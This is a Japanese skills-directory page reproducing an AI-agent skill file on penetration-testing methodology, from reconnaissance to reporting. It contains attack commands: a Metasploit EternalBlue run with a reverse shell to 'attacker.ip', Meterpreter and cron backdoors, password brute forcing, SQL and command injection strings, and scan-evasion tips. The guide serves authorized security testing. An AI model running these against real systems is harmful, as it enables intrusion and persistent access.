Agent Skills by ALSEL
Anthropic Claudeセキュリティ⭐ リポ 0品質スコア 50/100

ethical-hacking-methodology

偵察からレポート作成までペネトレーションテストの全ライフサイクルを習得するスキルです。倫理的ハッキング手法の5段階プロセス、必須ツール、攻撃テクニック、および承認済みセキュリティ評価のためのプロフェッショナルなレポート作成をカバーします。

description の原文を見る

Master the complete penetration testing lifecycle from reconnaissance through reporting. This skill covers the five stages of ethical hacking methodology, essential tools, attack techniques, and professional reporting for authorized security assessments.

SKILL.md 本文

認可された用途のみ: このスキルは認可されたペネトレーションテスト業務、防御的検証、または管理された教育環境でのみ使用してください。

倫理的ハッキング方法論

目的

偵察からレポート作成までのペネトレーションテストの完全なライフサイクルをマスターします。このスキルは、倫理的ハッキング方法論の5段階、必須ツール、攻撃技法、および認可されたセキュリティ評価のための専門的なレポート作成をカバーします。

前提条件

必須環境

  • Kali Linuxのインストール(永続的またはライブ)
  • 認可されたターゲットへのネットワークアクセス
  • システム所有者からの書面による認可

必須知識

  • ネットワークの基本概念
  • Linuxコマンドライン操作の習熟度
  • ウェブテクノロジーの理解
  • セキュリティコンセプトの理解

出力と成果物

  1. 偵察レポート - 収集されたターゲット情報
  2. 脆弱性評価 - 識別された弱点
  3. エクスプロイテーション証拠 - 概念実証攻撃
  4. 最終レポート - エグゼクティブサマリーと技術的所見

コアワークフロー

フェーズ1: ハッカータイプの理解

セキュリティ専門家の分類:

ホワイトハットハッカー(倫理的ハッカー)

  • 認可されたセキュリティ専門家
  • 許可を得てペネトレーションテストを実施
  • 目的: 脆弱性の特定と修正
  • 別名: ペネトレーションテスター、セキュリティコンサルタント

ブラックハットハッカー(悪意のある)

  • 認可されていないシステム侵入
  • 利益、復讐、または名声を目的とした動機
  • 目的: データの盗難、被害の加害
  • 別名: クラッカー、犯罪的ハッカー

グレーハットハッカー(ハイブリッド)

  • 倫理的境界を越える可能性
  • 悪意がないが規則違反の可能性あり
  • 脆弱性を公開することが多い
  • 混在した動機

その他の分類

  • スクリプトキディ: 理解せずに既成ツールを使用
  • ハクティビスト: 政治的または社会的動機
  • 国家主体: 政府が支援するオペレーター
  • コーダー: ツールとエクスプロイトを開発

フェーズ2: 偵察

直接的なシステム操作なしで情報を収集:

パッシブ偵察

# WHOIS検索
whois target.com

# DNS列挙
nslookup target.com
dig target.com ANY
dig target.com MX
dig target.com NS

# サブドメイン発見
dnsrecon -d target.com

# メールハーベスティング
theHarvester -d target.com -b all

Google Hacking (OSINT)

# 露出されたファイルを検索
site:target.com filetype:pdf
site:target.com filetype:xls
site:target.com filetype:doc

# ログインページを検索
site:target.com inurl:login
site:target.com inurl:admin

# ディレクトリリストを検索
site:target.com intitle:"index of"

# 設定ファイルを検索
site:target.com filetype:config
site:target.com filetype:env

Google Hacking Database カテゴリー:

  • パスワードを含むファイル
  • センシティブディレクトリ
  • ウェブサーバー検出
  • 脆弱なサーバー
  • エラーメッセージ
  • ログインポータル

ソーシャルメディア偵察

  • LinkedIn: 組織図、使用技術
  • Twitter: 企業の発表、従業員情報
  • Facebook: 個人情報、人間関係
  • 求人情報: 技術スタック関連情報

フェーズ3: スキャン

ターゲットシステムの能動的列挙:

ホスト発見

# Pingスイープ
nmap -sn 192.168.1.0/24

# ARPスキャン(ローカルネットワーク)
arp-scan -l

# アクティブなホストを発見
nmap -sP 192.168.1.0/24

ポートスキャン

# TCP SYNスキャン(ステルス)
nmap -sS target.com

# フルTCP接続スキャン
nmap -sT target.com

# UDPスキャン
nmap -sU target.com

# すべてのポートスキャン
nmap -p- target.com

# トップ1000ポート(サービス検出付き)
nmap -sV target.com

# アグレッシブスキャン(OS、バージョン、スクリプト)
nmap -A target.com

サービス列挙

# 特定サービススクリプト
nmap --script=http-enum target.com
nmap --script=smb-enum-shares target.com
nmap --script=ftp-anon target.com

# 脆弱性スキャン
nmap --script=vuln target.com

一般的なポート参照表

ポートサービス説明
21FTPファイル転送
22SSHセキュアシェル
23Telnet暗号化されていないリモート
25SMTPメール
53DNS名前解決
80HTTPウェブ
443HTTPSセキュアウェブ
445SMBWindowsシェア
3306MySQLデータベース
3389RDPリモートデスクトップ

フェーズ4: 脆弱性分析

悪用可能な弱点を特定:

自動スキャン

# Niktoウェブスキャナー
nikto -h http://target.com

# OpenVAS(コマンドライン)
omp -u admin -w password --xml="<get_tasks/>"

# Nessus(APIを通じて)
nessuscli scan --target target.com

ウェブアプリケーションテスト(OWASP)

  • SQLインジェクション
  • クロスサイトスクリプティング(XSS)
  • 認証の破損
  • セキュリティの誤設定
  • 機密データの暴露
  • XMLエクスターナルエンティティ(XXE)
  • アクセス制御の破損
  • 安全でないデシリアライゼーション
  • 既知の脆弱性を持つコンポーネントの使用
  • 不十分なログとモニタリング

手動技法

# ディレクトリブルートフォース
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# サブドメイン列挙
gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt

# ウェブ技術フィンガープリンティング
whatweb target.com

フェーズ5: エクスプロイテーション

発見された脆弱性を能動的に悪用:

Metasploitフレームワーク

# Metasploitを開始
msfconsole

# エクスプロイトを検索
msf> search type:exploit name:smb

# 特定のエクスプロイトを使用
msf> use exploit/windows/smb/ms17_010_eternalblue

# ターゲットを設定
msf> set RHOSTS target.com

# ペイロードを設定
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST attacker.ip

# 実行
msf> exploit

パスワード攻撃

# Hydraブルートフォース
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com
hydra -L users.txt -P passwords.txt ftp://target.com

# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

ウェブエクスプロイテーション

# SQLインジェクション用SQLMap
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database --tables

# XSSテスト
# 手動: <script>alert('XSS')</script>

# コマンドインジェクションテスト
# ; ls -la
# | cat /etc/passwd

フェーズ6: アクセス維持

永続的なアクセスを確立:

バックドア

# Meterpreterの永続性
meterpreter> run persistence -X -i 30 -p 4444 -r attacker.ip

# SSHキーの永続性
# ~/.ssh/authorized_keysに攻撃者の公開鍵を追加

# Cronジョブの永続性
echo "* * * * * /tmp/backdoor.sh" >> /etc/crontab

権限昇格

# Linux列挙
linpeas.sh
linux-exploit-suggester.sh

# Windows列挙
winpeas.exe
windows-exploit-suggester.py

# SUIDbイナリをチェック(Linux)
find / -perm -4000 2>/dev/null

# sudo権限をチェック
sudo -l

痕跡の削除(倫理的文脈)

  • 実行したすべてのアクションを記録
  • レポート作成のためにログを保持
  • 不要なシステム変更を避ける
  • テストファイルとバックドアをクリーンアップ

フェーズ7: レポート作成

調査結果を専門的に文書化:

レポート構成

  1. エグゼクティブサマリー

    • 高レベルの所見
    • ビジネスへの影響
    • リスク評価
    • 改善優先順位
  2. 技術的所見

    • 脆弱性の詳細
    • 概念実証
    • スクリーンショット/証拠
    • 影響を受けるシステム
  3. リスク評価

    • Critical(重大): 即座の対応が必要
    • High(高): 24~48時間以内に対応
    • Medium(中): 1週間以内に対応
    • Low(低): 1ヶ月以内に対応
    • Informational(情報): ベストプラクティス推奨事項
  4. 改善推奨事項

    • 各所見の具体的な修正
    • 短期的な軽減策
    • 長期的なソリューション
    • 必要なリソース
  5. 附属書

    • 詳細なスキャン出力
    • ツール構成
    • テストスケジュール
    • スコープと方法論

フェーズ8: 一般的な攻撃タイプ

フィッシング

  • メールベースの認証情報盗難
  • 偽のログインページ
  • 悪意あるファイル添付
  • ソーシャルエンジニアリング要素

マルウェアの種類

  • ウイルス: 自己複製、ホストファイルが必要
  • ワーム: ネットワーク全体で自己伝播
  • トロイの木馬: 正規ソフトウェアに偽装
  • ランサムウェア: 身代金のためにファイルを暗号化
  • ルートキット: 隠れたシステムレベルのアクセス
  • スパイウェア: ユーザーアクティビティをモニタリング

ネットワーク攻撃

  • 中間者攻撃(MITM)
  • ARPスプーフィング
  • DNSポイズニング
  • DDoS(分散型サービス拒否)

フェーズ9: Kali Linuxセットアップ

ペネトレーションテストプラットフォームをインストール:

ハードディスクインストール

  1. kali.orgからISOをダウンロード
  2. インストールメディアからブート
  3. 「Graphical Install」を選択
  4. 言語、場所、キーボードを設定
  5. ホスト名とrootパスワードを設定
  6. ディスクをパーティション分割(ガイド付き - ディスク全体を使用)
  7. GRUBブートローダーをインストール
  8. 再起動してログイン

ライブUSB(永続的)

# ブート可能なUSBを作成
dd if=kali-linux.iso of=/dev/sdb bs=512k status=progress

# 永続性パーティションを作成
gparted /dev/sdb
# 「persistence」というラベルのext4パーティションを追加

# 永続性を設定
mkdir /mnt/usb
mount /dev/sdb2 /mnt/usb
echo "/ union" > /mnt/usb/persistence.conf
umount /mnt/usb

フェーズ10: 倫理的ガイドライン

法的要件

  • 書面による認可を取得
  • スコープを明確に定義
  • すべてのテスト活動を文書化
  • すべての所見をクライアントに報告
  • 機密性を維持

専門的行為

  • 誠実性を持って倫理的に作業
  • アクセスしたデータのプライバシーを尊重
  • 不要なシステム損傷を避ける
  • 計画されたテストのみを実行
  • 個人的な利得のために所見を使用しない

クイックリファレンス

ペネトレーションテストのライフサイクル

ステージ目的主要ツール
偵察情報収集theHarvester、WHOIS、Google
スキャンターゲット列挙Nmap、Nikto、Gobuster
エクスプロイテーションアクセス取得Metasploit、SQLMap、Hydra
アクセス維持永続性Meterpreter、SSHキー
レポート作成所見の文書化レポートテンプレート

必須コマンド

コマンド目的
nmap -sV targetポート・サービススキャン
nikto -h targetウェブ脆弱性スキャン
msfconsoleMetasploit起動
hydra -l user -P list ssh://targetSSHブルートフォース
sqlmap -u "url?id=1" --dbsSQLインジェクション

制約と制限

認可が必須

  • 書面による許可なしでテストしない
  • 定義されたスコープ内にとどまる
  • 認可されていないアクセス試行を報告

専門的基準

  • 交戦規則を遵守
  • クライアントの機密性を維持
  • 使用した方法論を文書化
  • 実行可能な推奨事項を提供

トラブルシューティング

スキャンがブロックされる

解決策:

  1. より遅いスキャンレートを使用
  2. 異なるスキャン技法を試す
  3. プロキシまたはVPNを使用
  4. パケットをフラグメント化

エクスプロイトが失敗する

解決策:

  1. ターゲット脆弱性の存在を確認
  2. ペイロード互換性をチェック
  3. エクスプロイトパラメータを調整
  4. 代替エクスプロイトを試す

使用時期

このスキルは、概要に記載されたワークフローまたはアクションを実行する場合に適用できます。

ライセンス: MIT(寛容ライセンスのため全文を引用しています) · 原本リポジトリ

詳細情報

作者
sickn33
リポジトリ
sickn33/antigravity-awesome-skills
ライセンス
MIT
最終更新
不明

Source: https://github.com/sickn33/antigravity-awesome-skills / ライセンス: MIT

関連スキル

Anthropic Claudeセキュリティ⭐ リポ 8,981

secure-code-guardian

認証・認可の実装、ユーザー入力の保護、OWASP Top 10の脆弱性対策が必要な場合に使用します。bcrypt/argon2によるパスワードハッシング、パラメータ化ステートメントによるSQLインジェクション対策、CORS/CSPヘッダーの設定、Zodによる入力検証、JWTトークンの構築などのカスタムセキュリティ実装に対応します。認証、認可、入力検証、暗号化、OWASP Top 10対策、セッション管理、セキュリティ強化全般で活用できます。ただし、構築済みのOAuth/SSO統合や単独のセキュリティ監査が必要な場合は、より特化したスキルの検討をお勧めします。

by Jeffallan
汎用セキュリティ⭐ リポ 1,982

claude-authenticity

APIエンドポイントが本物のClaudeによって支えられているか(ラッパーやプロキシ、偽装ではないか)を、claude-verifyプロジェクトを模した9つの重み付きルールベースチェックで検証できます。また、Claudeの正体を上書きしているプロバイダーから注入されたシステムプロンプトも抽出します。完全に自己完結しており、httpx以外の追加パッケージは不要です。Claude APIキーまたはエンドポイントを検証したい場合、サードパーティのClaudeサービスが本物か確認したい場合、APIプロバイダーのClaude正当性を監査したい場合、複数モデルを並行してテストしたい場合、またはプロバイダーが注入したシステムプロンプトを特定したい場合に使用できます。

by LeoYeAI
Anthropic Claudeセキュリティ⭐ リポ 2,159

anth-security-basics

Anthropic Claude APIのセキュリティベストプラクティスを適用し、キー管理、入力値の検証、プロンプトインジェクション対策を実施します。APIキーの保護、Claudeに送信する前のユーザー入力検証、コンテンツセーフティガードレールの実装が必要な場合に活用できます。「anthropic security」「claude api key security」「secure anthropic」「prompt injection defense」といったフレーズでトリガーされます。

by jeremylongshore
汎用セキュリティ⭐ リポ 699

x-ray

x-ray.mdプレ監査レポートを生成します。概要、強化された脅威モデル(プロトコルタイプのプロファイリング、Gitの重み付け攻撃面分析、時間軸リスク分析、コンポーザビリティ依存関係マッピング)、不変条件、統合、ドキュメント品質、テスト分析、開発者・Gitの履歴をカバーしています。「x-ray」「audit readiness」「readiness report」「pre-audit report」「prep this protocol」「protocol prep」「summarize this protocol」のキーワードで実行されます。

by pashov
汎用セキュリティ⭐ リポ 677

semgrep

Semgrepスタティック分析スキャンを実行し、カスタム検出ルールを作成します。Semgrepでのコードスキャン、セキュリティ脆弱性の検出、カスタムYAMLルールの作成、または特定のバグパターンの検出が必要な場合に使用します。重要:ユーザーが「バグをスキャンしたい」「コード品質を確認したい」「脆弱性を見つけたい」「スタティック分析」「セキュリティlint」「コード監査」または「コーディング標準を適用したい」と尋ねた場合も、Semgrepという名称を明記していなくても、このスキルを使用してください。Semgrepは30以上の言語に対応したパターンベースのコードスキャンに最適なツールです。

by wimpysworld
汎用セキュリティ⭐ リポ 591

ghost-bits-cast-attack

Java「ゴーストビッツ」/キャストアタック プレイブック(Black Hat Asia 2026)。16ビット文字が8ビットバイトに暗黙的に縮小されるJavaサービスへの攻撃時に使用します。WAF/IDSを回避して、SQLインジェクション、デシリアライゼーション型RCE、ファイルアップロード(Webシェル)、パストトラバーサル、CRLF インジェクション、リクエストスマグリング、SMTPインジェクションを実行できます。Tomcat、Spring、Jetty、Undertow、Vert.x、Jackson、Fastjson、Apache Commons BCEL、Apache HttpClient、Angus Mail、JDK HttpServer、Lettuce、Jodd、XMLWriterに影響し、WAFバイパスにより多くの「パッチ済み」CVEを再度有効化します。

by yaklang
本サイトは GitHub 上で公開されているオープンソースの SKILL.md ファイルをクロール・インデックス化したものです。 各スキルの著作権は原作者に帰属します。掲載に問題がある場合は info@alsel.co.jp または /takedown フォームよりご連絡ください。
原作者: sickn33 · sickn33/antigravity-awesome-skills · ライセンス: MIT